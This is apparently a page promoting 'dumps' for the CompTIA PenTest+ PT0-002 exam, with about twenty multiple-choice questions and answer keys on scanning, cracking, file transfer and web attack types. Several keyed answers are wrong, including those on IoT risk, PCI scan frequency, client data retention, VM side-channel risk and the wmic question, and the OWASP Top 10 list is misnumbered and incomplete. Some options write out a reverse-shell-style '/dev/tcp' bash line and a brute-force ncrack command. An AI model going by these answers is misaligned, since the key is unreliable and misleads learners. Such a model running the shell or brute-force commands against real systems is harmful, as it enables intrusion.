All that matters here is passing the CompTIA PT0-002 exam, and all you need is a high score on the PT0-002 CompTIA PenTest+ Certification Exam. The only thing you need to do is download the Exambible PT0-002 exam study guides now. We will not let you down with our money-back guarantee.

Online CompTIA PT0-002 free dumps demo below:

Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Buffer overflows
  • B. Cross-site scripting
  • C. Race-condition attacks
  • D. Zero-day attacks
  • E. Injection flaws
  • F. Ransomware attacks

Answer: BE


A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring

A penetration tester is attempting to discover live hosts on a subnet quickly. Which of the following commands will perform a ping scan?

  • A. nmap -sn
  • B. nmap -sV -A
  • C. nmap -Pn
  • D. nmap -sT -p-

Answer: A

Which of the following is the MOST common vulnerability associated with IoT devices that are directly connected to the Internet?

  • A. Unsupported operating systems
  • B. Susceptibility to DDoS attacks
  • C. Inability to network
  • D. The existence of default passwords

Answer: A

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.
Which of the following should the tester verify FIRST to assess this risk?

  • A. Whether sensitive client data is publicly accessible
  • B. Whether the connection between the cloud and the client is secure
  • C. Whether the client's employees are trained properly to use the platform
  • D. Whether the cloud applications were developed using a secure SDLC

Answer: A

A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT?

  • A. John the Ripper
  • B. Hydra
  • C. Mimikatz
  • D. Cain and Abel

Answer: A

An assessment has been completed, and all reports and evidence have been turned over to the client. Which of the following should be done NEXT to ensure the confidentiality of the client’s information?

  • A. Follow the established data retention and destruction process
  • B. Report any findings to regulatory oversight groups
  • C. Publish the findings after the client reviews the report
  • D. Encrypt and store any client information for future analysis

Answer: D

A penetration tester discovers during a recent test that an employee in the accounting department has been making changes to a payment system and redirecting money into a personal bank account. The penetration test was immediately stopped. Which of the following would be the BEST recommendation to prevent this type of activity in the future?

  • A. Enforce mandatory employee vacations
  • B. Implement multifactor authentication
  • C. Install video surveillance equipment in the office
  • D. Encrypt passwords for bank account information

Answer: B

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Open-source research
  • B. A ping sweep
  • C. Traffic sniffing
  • D. Port knocking
  • E. A vulnerability scan
  • F. An Nmap scan

Answer: AC

A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?

  • A. nc 9891 < exploit
  • B. powershell -exec bypass -f \\\9891
  • C. bash -i >& /dev/tcp/ 0&1>/exploit
  • D. wget

Answer: D

A penetration tester runs a scan against a server and obtains the following output:
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-12-20 09:23AM 331 index.aspx
| ftp-syst:
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2012 Std
3389/tcp open ssl/ms-wbt-server
| rdp-ntlm-info:
| Target Name: WEB3
| NetBIOS_Computer_Name: WEB3
| Product_Version: 6.3.9600
|_ System_Time: 2021-01-15T11:32:06+00:00
8443/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
Which of the following command sequences should the penetration tester try NEXT?

  • A. ftp
  • B. smbclient \\\\WEB3\\IPC$ -I -U guest
  • C. ncrack -u Administrator -P 15worst_passwords.txt -p rdp
  • D. curl -X TRACE
  • E. nmap --script vuln -sV

Answer: A

A penetration tester ran the following commands on a Windows server:
[Exhibit image not included]
Which of the following should the tester do AFTER delivering the final report?

  • A. Delete the scheduled batch job.
  • B. Close the reverse shell connection.
  • C. Downgrade the svsaccount permissions.
  • D. Remove the tester-created credentials.

Answer: D

Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod u+x
  • B. chmod u+e
  • C. chmod o+e
  • D. chmod o+x

Answer: A

When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal?

  • A. <#
  • B. <$
  • C. ##
  • D. #$
  • E. #!

Answer: E

A penetration tester needs to perform a test on a finance system that is PCI DSS v3.2.1 compliant. Which of the following is the MINIMUM frequency to complete the scan of the system?

  • A. Weekly
  • B. Monthly
  • C. Quarterly
  • D. Annually

Answer: A

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

  • A. Alternate data streams
  • B. PowerShell modules
  • C. MP4 steganography
  • D. PsExec

Answer: D

You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
[Exhibit image not included]

* 1. Reflected XSS - Input sanitization (<> ...)
* 2. SQL Injection Stacked - Parameterized queries
* 3. DOM XSS - Input sanitization (<> ...)
* 4. Local File Inclusion - Sandbox request
* 5. Command Injection - Sandbox request
* 6. SQLi union - Parameterized queries
* 7. SQLi error - Parameterized queries
* 8. Remote File Inclusion - Sandbox
* 9. Command Injection - Input sanitization $
* 10. URL redirect - Prevent external calls

Does this meet the goal?
  • A. Yes
  • B. Not Mastered

Answer: A

A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

  • A. Partially known environment testing
  • B. Known environment testing
  • C. Unknown environment testing
  • D. Physical environment testing

Answer: C

A penetration tester was conducting a penetration test and discovered the network traffic was no longer reaching the client’s IP address. The tester later discovered the SOC had used sinkholing on the penetration tester’s IP address. Which of the following BEST describes what happened?

  • A. The penetration tester was testing the wrong assets
  • B. The planning process failed to ensure all teams were notified
  • C. The client was not ready for the assessment to start
  • D. The penetration tester had incorrect contact information

Answer: B

A company is concerned that its cloud service provider is not adequately protecting the VMs housing its software development. The VMs are housed in a datacenter with other companies sharing physical resources. Which of the following attack types is MOST concerning to the company?

  • A. Data flooding
  • B. Session riding
  • C. Cybersquatting
  • D. Side channel

Answer: B

A penetration tester would like to obtain FTP credentials by deploying a workstation as an on-path attack between the target and the server that has the FTP protocol. Which of the following methods would be the BEST to accomplish this objective?

  • A. Wait for the next login and perform a downgrade attack on the server.
  • B. Capture traffic using Wireshark.
  • C. Perform a brute-force attack over the server.
  • D. Use an FTP exploit against the server.

Answer: B

